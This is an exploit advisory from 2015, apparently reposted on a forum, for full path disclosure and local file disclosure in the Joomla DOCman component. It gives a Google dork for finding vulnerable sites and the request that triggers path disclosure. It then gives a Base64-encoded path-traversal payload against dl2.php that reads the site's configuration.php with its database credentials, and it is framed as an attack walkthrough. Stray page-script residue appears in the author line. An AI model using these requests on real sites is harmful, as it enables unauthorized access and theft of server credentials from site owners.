Description:
Joomla Docman suffers from full path disclosure and local file inclusion vulnerabilities.
[PHP] 纯文本查看 复制代码 # Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
# CWE: CWE-200(FPD) CWE-98(LFI/LFD)
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: [email]hugo.s@linuxmail.org[/email]<script cf-hash="f9e31" type="text/javascript">
/* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */</script>
# Date: 13/07/2015
# Vendor Homepage: [url]http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman[/url]
# Google Dork: inurl:"/components/com_docman/dl2.php"
# Xploit (FPD):
Get one target and just download with blank parameter:
[url]http://www.site.com/components/com_docman/dl2.php?archive=0&file=[/url]
In title will occur Full Path Disclosure of server.
# Xploit (LFD/LFI):
[url]http://www.site.com/components/com_docman/dl2.php?archive=0&file=[/url][LDF]
Let's Xploit...
First we need use Xploit FPD to see the path of target, after that we'll Insert 'configuration.php' configuration database file and encode in Base64:
../../../../../../../target/www/configuration.php <= Not Ready
[url]http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==[/url] <= Ready !
And Now we have a configuration file... | 
发表于 2015-7-16 11:46:42
发表于 2015-7-16 13:03:41
